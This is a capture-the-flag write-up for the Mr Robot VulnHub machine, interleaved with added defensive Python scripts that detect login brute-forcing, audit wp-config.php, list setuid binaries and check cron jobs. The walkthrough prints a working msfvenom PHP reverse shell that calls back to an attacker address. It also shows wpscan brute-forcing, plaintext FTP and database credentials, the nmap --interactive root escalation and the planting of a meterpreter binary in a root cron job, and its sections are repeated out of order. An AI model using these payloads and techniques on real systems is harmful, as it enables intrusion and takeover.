Mr Robot

This is my write-up for the Mr Robot VM on VulnHub.

Link To Vulnhub

As usual we start with a good old nmap scan 🙂

nmap 192.168.0.97 -A -p - -T5

Starting Nmap 7.12 ( https://nmap.org ) at 2016-07-01 20:00 EDT
Nmap scan report for linux (192.168.0.97)
Host is up (0.00051s latency).
Not shown: 65532 filtered ports
PORT    STATE  SERVICE  VERSION
22/tcp  closed ssh
80/tcp  open   http     Apache httpd
|_http-server-header: Apache
|_http-title: Site doesn't have a title (text/html).
443/tcp open   ssl/http Apache httpd
|_http-server-header: Apache
|_http-title: Site doesn't have a title (text/html).
| ssl-cert: Subject: commonName=www.example.com
| Not valid before: 2015-09-16T10:45:03
|_Not valid after:  2025-09-13T10:45:03
MAC Address: 08:00:27:38:35:A7 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.10 - 4.1
Network Distance: 1 hop

TRACEROUTE
HOP RTT     ADDRESS
1   0.51 ms linux (192.168.0.97)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 70.40 seconds

Checking the robots.txt revealed a dictionary and the first key.

User-agent: *
fsocity.dic
key-1-of-3.txt

curl 192.168.0.97/key-1-of-3.txt
073403c8a58a1f80d943455fb30724b9

wget 192.168.0.97/fsocity.dic

Because the dictionary contains many duplicate entries, I needed to sort it and remove the duplicates:

sort -u fsocity.dic > fsociety.lst

Since there is a web server running, we start dirb and nikto to learn more about it.

We can see there is a WordPress install running on the server.

wpscan -u http://192.168.0.97/ --wordlist /root/Dropbox/Vulnhub/MrRobot/fsocity.dic --username user 

I first used "user" as the username to brute-force, because the website says "welcome to user's WordPress".

Since that didn't work, I had to think about which other users this WordPress install might have. The VM is named Mr Robot, and the main character of Mr Robot is called Elliot, so I tried that username as well.

wpscan -u http://192.168.0.97/ --wordlist /root/Dropbox/Vulnhub/MrRobot/fsociety.lst --username Elliot

Brute Forcing 'Elliot' Time: 00:02:54  (5636 / 11452) 49.21%  ETA: 00:03:00
  +----+--------+------+-----------+
  | Id | Login  | Name | Password  |
  +----+--------+------+-----------+
  |    | Elliot |      | ER28-0652 |
  +----+--------+------+-----------+
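Seen from the server side, a run like that is easy to spot: every password guess is one POST to /wp-login.php, so the attack shows up as a burst of POSTs from a single client, a string of 200s (the form re-rendered with an error) and, once a guess is accepted, a 302 redirect. The following is an added example, not part of the original write-up and not wpscan's code, that parses Apache combined-format access logs and flags clients that exceed a threshold of login POSTs inside a sliding window. The log lines it runs on are constructed to mimic the run above; the threshold and window values are assumptions to tune per site.

```python
"""Flag WordPress login brute-force bursts in Apache access logs.

Added example; not part of the original write-up. Each wpscan password guess
is one POST to /wp-login.php, so from the server side the attack is a burst of
POSTs from one client: a run of 200s and, if a guess is accepted, a 302.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta, timezone

# Apache "combined" log format. The sample lines below are constructed for this example.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$'
)
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"


def parse_line(line):
    """Parse one combined-format line into a dict, or return None if it does not match."""
    m = LOG_RE.match(line.strip())
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], TS_FMT)
    rec["status"] = int(rec["status"])
    return rec


def find_login_bursts(lines, threshold=10, window=timedelta(minutes=1)):
    """Return {ip: {"attempts": n, "success": bool}} for every client that sent
    at least `threshold` POSTs to /wp-login.php inside any `window`-long span."""
    posts = defaultdict(list)  # ip -> [(timestamp, status), ...]
    for line in lines:
        rec = parse_line(line)
        if rec and rec["method"] == "POST" and rec["path"].startswith("/wp-login.php"):
            posts[rec["ip"]].append((rec["ts"], rec["status"]))

    flagged = {}
    for ip, events in posts.items():
        events.sort()
        start = 0
        for end in range(len(events)):
            # slide the window start forward until events[start..end] fits in `window`
            while events[end][0] - events[start][0] > window:
                start += 1
            if end - start + 1 >= threshold:
                flagged[ip] = {
                    "attempts": len(events),
                    # a 302 among the login POSTs means one guess was accepted
                    "success": any(status == 302 for _, status in events),
                }
                break
    return flagged


# --- constructed sample log (assumed timestamps and client addresses) --------------
_T0 = datetime(2016, 7, 1, 20, 10, 0, tzinfo=timezone(timedelta(hours=-4)))


def _line(ip, offset_s, method, path, status, ua):
    ts = (_T0 + timedelta(seconds=offset_s)).strftime(TS_FMT)
    return f'{ip} - - [{ts}] "{method} {path} HTTP/1.1" {status} 3492 "-" "{ua}"'


SAMPLE_LOG = (
    # 12 guesses in 22 seconds from one client; the last one succeeds (302)
    [_line("192.168.0.181", 2 * i, "POST", "/wp-login.php", 200, "WPScan v2.9") for i in range(11)]
    + [_line("192.168.0.181", 22, "POST", "/wp-login.php", 302, "WPScan v2.9")]
    # a legitimate user: one failed and one successful login five minutes apart
    + [_line("192.168.0.50", 0, "POST", "/wp-login.php", 200, "Mozilla/5.0"),
       _line("192.168.0.50", 300, "POST", "/wp-login.php", 302, "Mozilla/5.0"),
       _line("192.168.0.50", 301, "GET", "/wp-admin/", 200, "Mozilla/5.0")]
)


def detect_sample():
    """Run the detector over the constructed sample."""
    return find_login_bursts(SAMPLE_LOG)


if __name__ == "__main__":
    for ip, info in detect_sample().items():
        print(f"{ip}: {info['attempts']} login POSTs, success={info['success']}")
```

The "success" flag is what turns a noisy alert into an urgent one: a burst of 200s is a failed brute-force, a burst that ends in a 302 is a compromised account.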

We can now log in to WordPress and change the content of 404.php to any PHP code of our liking. I used this PHP code, which was generated by msfvenom:

/*<?php /**/ error_reporting(0); $ip = '192.168.0.181'; $port = 443; if (($f = 'stream_socket_client') && is_callable($f)) { $s = $f("tcp://{$ip}:{$port}"); $s_type = 'stream'; } elseif (($f = 'fsockopen') && is_callable($f)) { $s = $f($ip, $port); $s_type = 'stream'; } elseif (($f = 'socket_create') && is_callable($f)) { $s = $f(AF_INET, SOCK_STREAM, SOL_TCP); $res = @socket_connect($s, $ip, $port); if (!$res) { die(); } $s_type = 'socket'; } else { die('no socket funcs'); } if (!$s) { die('no socket'); } switch ($s_type) { case 'stream': $len = fread($s, 4); break; case 'socket': $len = socket_read($s, 4); break; } if (!$len) { die(); } $a = unpack("Nlen", $len); $len = $a['len']; $b = ''; while (strlen($b) < $len) { switch ($s_type) { case 'stream': $b .= fread($s, $len-strlen($b)); break; case 'socket': $b .= socket_read($s, $len-strlen($b)); break; } } $GLOBALS['msgsock'] = $s; $GLOBALS['msgsock_type'] = $s_type; eval($b); die();

curl 192.168.0.97/404.php

We get a shell as the user daemon.

With the shell we can see the user robot in /home/robot:

ls -larth
total 16K
drwxr-xr-x 3 root  root  4.0K Nov 13  2015 ..
drwxr-xr-x 2 root  root  4.0K Nov 13  2015 .
-r-------- 1 robot robot   33 Nov 13  2015 key-2-of-3.txt
-rw-r--r-- 1 robot robot   39 Nov 13  2015 password.raw-md5
robot@linux:~$ cat key-2-of-3.txt
cat key-2-of-3.txt
822c73956184f694993bede3eb39f959
robot@linux:~$ cat password.raw-md5
cat password.raw-md5
robot:c3fcd3d76192e4007dfb496cca67e13b
A quick Google search for the hash gives us http://md5cracker.org/decrypted-md5-hash/c3fcd3d76192e4007dfb496cca67e13b

So we can switch user with su robot; the password is abcdefghijklmnopqrstuvwxyz.

From enumerating the system we can see there is a WordPress config file with the database password in it, as well as the FTP user and password:

define('FS_METHOD', 'ftpext');
define('FTP_BASE', '/opt/bitnami/apps/wordpress/htdocs/');
define('FTP_USER', 'bitnamiftp');
define('FTP_PASS', 'inevoL7eAlBeD2b5WszPbZ2gJ971tJZtP0j86NYPyh6Wfz1x8a');
define('FTP_HOST', '127.0.0.1');
define('FTP_SSL', false);

and the database configuration:

/** The name of the database for WordPress */
define('DB_NAME', 'bitnami_wordpress');

/** MySQL database username */
define('DB_USER', 'bn_wordpress');

/** MySQL database password */
define('DB_PASSWORD', '570fd42948');

/** MySQL hostname */
define('DB_HOST', 'localhost:3306');
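Two settings in that config are what made the earlier steps possible: the built-in file editor was left enabled (DISALLOW_FILE_EDIT is not defined), which is what lets any admin account overwrite 404.php with PHP, and the file carries plaintext FTP and database credentials that a low-privileged shell can read. The following is an added example, not part of the original write-up and not WordPress code, that parses a wp-config.php for its define() entries and reports those conditions. The sample configs in it are constructed with the same key names as the file quoted above and placeholder secrets; the permission-bit policy is an assumption.

```python
"""Audit a WordPress wp-config.php for the settings that made the steps above possible.

Added example; not part of the original write-up or of WordPress itself.
Checks: file editor enabled (DISALLOW_FILE_EDIT unset), plaintext FTP
credentials stored for FS_METHOD 'ftpext', and world-readable file mode.
"""
import os
import re

# define('KEY', value); with straight or curly quotes (copy-pasted configs, like
# the one quoted above, often carry curly quotes)
DEFINE_RE = re.compile(r"""define\(\s*['"‘’](?P<key>[A-Z_]+)['"‘’]\s*,\s*(?P<val>[^)]+?)\s*\)\s*;""")


def parse_defines(text):
    """Return {KEY: value-as-string} for every define() in the text."""
    out = {}
    for m in DEFINE_RE.finditer(text):
        out[m.group("key")] = m.group("val").strip().strip("'\"‘’")
    return out


def audit_wp_config(text, mode=0o640):
    """Return a list of (code, message) findings for the config text.
    `mode` is the file's permission bits (st_mode & 0o777); 0o640, the usual
    owner/web-server-group layout, is treated as acceptable (assumed policy)."""
    d = parse_defines(text)
    findings = []
    if d.get("DISALLOW_FILE_EDIT", "false").lower() != "true":
        findings.append(("FILE_EDIT_ENABLED",
                         "theme/plugin editor enabled: any admin account can write PHP into the webroot"))
    if d.get("FS_METHOD") == "ftpext" and "FTP_PASS" in d:
        findings.append(("FTP_CREDS_IN_CONFIG",
                         f"plaintext FTP password for {d.get('FTP_USER', '?')!r} stored in wp-config.php"))
    if mode & 0o004:
        findings.append(("CONFIG_WORLD_READABLE",
                         f"mode {oct(mode)} lets every local user read DB_PASSWORD"))
    return findings


def audit_file(path):
    """Audit a wp-config.php on disk, using its real permission bits."""
    with open(path, encoding="utf-8", errors="replace") as fh:
        text = fh.read()
    return audit_wp_config(text, os.stat(path).st_mode & 0o777)


# Constructed: the same keys as the config quoted above, with placeholder secrets.
WEAK_CONFIG = """
define('FS_METHOD', 'ftpext');
define('FTP_BASE', '/opt/bitnami/apps/wordpress/htdocs/');
define('FTP_USER', 'bitnamiftp');
define('FTP_PASS', 'PLACEHOLDER_FTP_PASSWORD');
define('FTP_HOST', '127.0.0.1');
define('FTP_SSL', false);
define('DB_NAME', 'bitnami_wordpress');
define('DB_USER', 'bn_wordpress');
define('DB_PASSWORD', 'PLACEHOLDER_DB_PASSWORD');
define('DB_HOST', 'localhost:3306');
"""

# Constructed hardened form: editor disabled, direct filesystem writes, no FTP credentials.
HARDENED_CONFIG = """
define('DISALLOW_FILE_EDIT', true);
define('FS_METHOD', 'direct');
define('DB_NAME', 'bitnami_wordpress');
define('DB_USER', 'bn_wordpress');
define('DB_PASSWORD', 'PLACEHOLDER_DB_PASSWORD');
define('DB_HOST', 'localhost:3306');
"""

if __name__ == "__main__":
    for code, msg in audit_wp_config(WEAK_CONFIG, mode=0o644):
        print(f"{code}: {msg}")
```

Setting DISALLOW_FILE_EDIT does not stop an attacker who already has admin credentials from uploading a plugin, so it belongs next to the login-burst alerting above rather than instead of it.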

With the FTP user I can read and write files as that user, but that didn't help me get a root shell, even though there is a cron job running that uses the bitnami user.

What finally got me the root shell: I realized I was running nmap as a non-root user, but nmap still ran as root!
nmap has an interactive option that can give you a shell. To get it, just type:

nmap --interactive
!sh
There we got the root shell! 🙂

cat key-3-of-3.txt
04787ddef27c3dee1ee161b21670b4e4
# whoami
whoami
root
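The thing to catch on the defensive side is not nmap specifically but any setuid-root binary that can hand a shell to whoever runs it (later nmap releases dropped the interactive mode, but other setuid binaries have equivalent escapes). The following is an added example, not part of the original write-up, that walks the usual binary directories, keeps only setuid-root regular files, and sorts them into a known-dangerous set, an expected baseline, and everything else for manual review. Both name sets are illustrative assumptions: the dangerous set lists only the binary from this box and should be extended from a reference such as GTFOBins; the sample entries are constructed.

```python
"""List setuid-root binaries and flag the ones that can hand out a shell.

Added example; not part of the original write-up. classify_suid() works on
(path, st_mode, st_uid) tuples so the logic can be exercised on the constructed
sample below; scan_suid() collects real tuples from the host.
"""
import os
import stat

# Setuid-root binaries known to offer a shell escape. Only the one from this
# box is listed; extend the set from a reference such as GTFOBins (assumption).
SHELL_ESCAPE_CAPABLE = {"nmap"}

# Setuid-root binaries normally present on a Linux host (illustrative baseline).
EXPECTED_SUID = {"su", "sudo", "passwd", "mount", "umount", "ping", "chsh", "chfn",
                 "newgrp", "gpasswd", "pkexec"}


def classify_suid(entries):
    """entries: iterable of (path, st_mode, st_uid).
    Returns {"dangerous": [...], "unexpected": [...], "expected": [...]},
    each a sorted list of setuid-root regular files."""
    report = {"dangerous": [], "unexpected": [], "expected": []}
    for path, mode, uid in entries:
        if not stat.S_ISREG(mode) or not (mode & stat.S_ISUID) or uid != 0:
            continue  # not a regular file, not setuid, or setuid to a non-root user
        name = os.path.basename(path)
        if name in SHELL_ESCAPE_CAPABLE:
            report["dangerous"].append(path)
        elif name in EXPECTED_SUID:
            report["expected"].append(path)
        else:
            report["unexpected"].append(path)
    for bucket in report.values():
        bucket.sort()
    return report


def scan_suid(roots=("/bin", "/sbin", "/usr/bin", "/usr/sbin", "/usr/local/bin", "/usr/local/sbin")):
    """Yield (path, st_mode, st_uid) for every file under the given directories.
    lstat is used so symlinks are reported as themselves, not followed."""
    for root in roots:
        for dirpath, _dirs, files in os.walk(root):
            for name in files:
                path = os.path.join(dirpath, name)
                try:
                    st = os.lstat(path)
                except OSError:
                    continue
                yield path, st.st_mode, st.st_uid


# Constructed sample modelled on the box: setuid-root nmap next to ordinary entries.
SAMPLE_ENTRIES = [
    ("/usr/local/bin/nmap", stat.S_IFREG | 0o4755, 0),
    ("/bin/su", stat.S_IFREG | 0o4755, 0),
    ("/usr/bin/passwd", stat.S_IFREG | 0o4755, 0),
    ("/usr/bin/customtool", stat.S_IFREG | 0o4755, 0),
    ("/usr/bin/python3", stat.S_IFREG | 0o755, 0),            # not setuid: ignored
    ("/home/robot/bin/helper", stat.S_IFREG | 0o4755, 1002),  # setuid, but not to root: ignored
]

if __name__ == "__main__":
    report = classify_suid(scan_suid())
    for bucket in ("dangerous", "unexpected", "expected"):
        for path in report[bucket]:
            print(f"{bucket:10} {path}")
```

Run it from cron or a config-management check and diff the output against the last run; a new entry in "dangerous" or "unexpected" is the signal, since the expected set changes rarely.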

Thank you for reading this 🙂

nmap is installed on the box and the user robot is allowed to scan with it, so I did a bunch of scans locally and discovered that there is an FTP service running on the box.

nc -v 127.0.0.1 21
nc -v 127.0.0.1 21
Connection to 127.0.0.1 21 port [tcp/ftp] succeeded!
220 (vsFTPd 3.0.2)
USER bitnamiftp
USER bitnamiftp
331 Please specify the password.
PASS inevoL7eAlBeD2b5WszPbZ2gJ971tJZtP0j86NYPyh6Wfz1x8a
PASS inevoL7eAlBeD2b5WszPbZ2gJ971tJZtP0j86NYPyh6Wfz1x8a
230 Login successful.
CWD bitnami
CWD bitnami
250 Directory successfully changed.
CWD stats
CWD stats
550 Failed to change directory.
CWD /opt/bitnami/stats
CWD /opt/bitnami/stats
250 Directory successfully changed.
PASV
PASV
227 Entering Passive Mode (127,0,0,1,41,198).
LIST -l
LIST -l
150 Here comes the directory listing.
226 Directory send OK.
STOR ./agent.bin
STOR ./agent.bin
425 Use PORT or PASV first.
PASV
PASV
227 Entering Passive Mode (127,0,0,1,138,47).
STOR /opt/bitnami/stats/agent.bin
STOR /opt/bitnami/stats/agent.bin
425 Failed to establish connection.

PASV
PASV
227 Entering Passive Mode (127,0,0,1,34,208).
STOR /opt/bitnami/stats/agent.bin
STOR /opt/bitnami/stats/agent.bin
150 Ok to send data.
226 Transfer complete.
421 Timeout.
nc -v 127.0.0.1 35375 < /tmp/vipermeter.elf
# This transfers vipermeter.elf into agent.bin, which the crontab executes every hour at 55 minutes past the hour.
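The root path here is a classic cron weakness: a job that runs as root executes a file from a location another account can write to. The following is an added example, not part of the original write-up, that parses an /etc/crontab-style file and reports every job whose executable, or the directory holding it, is owned by a non-root user or is group/other-writable. The crontab text and file metadata it runs on are constructed (the box's real cron line is not quoted above, and the uid is made up); real_stat() is the adapter for a live host.

```python
"""Find cron jobs whose executable a non-root user could replace.

Added example; not part of the original write-up. audit_cron() checks each
job's executable and its parent directory for ownership or permission bits
that let a non-root user change them.
"""
import os
import re
import stat

# /etc/crontab-style line: five time fields (or an @shortcut), a user, then the command
CRON_RE = re.compile(r"^\s*(?:@\w+\s+|(?:\S+\s+){5})(?P<user>\S+)\s+(?P<cmd>.+)$")


def parse_crontab(text):
    """Yield (user, command) for each job line; comments, blanks and VAR=... lines are skipped."""
    for line in text.splitlines():
        tokens = line.split()
        if not tokens or tokens[0].startswith("#") or "=" in tokens[0]:
            continue
        m = CRON_RE.match(line)
        if m:
            yield m.group("user"), m.group("cmd")


def writable_by_non_root(st_mode, st_uid):
    """True if the path is owned by a non-root uid or is group/other-writable."""
    return st_uid != 0 or bool(st_mode & (stat.S_IWGRP | stat.S_IWOTH))


def audit_cron(text, stat_fn):
    """stat_fn(path) -> (st_mode, st_uid), or None if the path does not exist.
    Returns [(user, target, reason)] for jobs a non-root user could hijack."""
    findings = []
    for user, cmd in parse_crontab(text):
        target = cmd.split()[0]
        if not target.startswith("/"):
            continue  # resolved through PATH; out of scope for this check
        checks = ((target, "executable"), (os.path.dirname(target), "directory"))
        for path, what in checks:
            st = stat_fn(path)
            if st is None:
                if what == "executable":
                    findings.append((user, target,
                                     "executable does not exist yet: whoever can write the directory creates it"))
                continue
            if writable_by_non_root(*st):
                findings.append((user, target, f"{what} {path} is writable by a non-root user"))
    return findings


def real_stat(path):
    """stat_fn for a live host."""
    try:
        st = os.lstat(path)
    except OSError:
        return None
    return st.st_mode, st.st_uid


# Constructed sample: an hourly agent job like the one on the box, plus a sound job.
SAMPLE_CRONTAB = """
SHELL=/bin/sh
# m  h  dom mon dow user  command
55 *  *   *   *   root /opt/bitnami/stats/agent.bin
0  3  *   *   *   root /usr/local/sbin/backup.sh
"""

# Constructed metadata: the stats directory and binary belong to the FTP account (uid 1001 assumed).
SAMPLE_FS = {
    "/opt/bitnami/stats": (stat.S_IFDIR | 0o755, 1001),
    "/opt/bitnami/stats/agent.bin": (stat.S_IFREG | 0o755, 1001),
    "/usr/local/sbin": (stat.S_IFDIR | 0o755, 0),
    "/usr/local/sbin/backup.sh": (stat.S_IFREG | 0o755, 0),
}

if __name__ == "__main__":
    for user, target, reason in audit_cron(SAMPLE_CRONTAB, SAMPLE_FS.get):
        print(f"[{user}] {target}: {reason}")
```

The fix on the box side is the usual one: root-owned, non-writable job directories, or running the stats agent as the account that owns its files rather than as root.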

To get a shell as root:
nmap --interactive
!sh
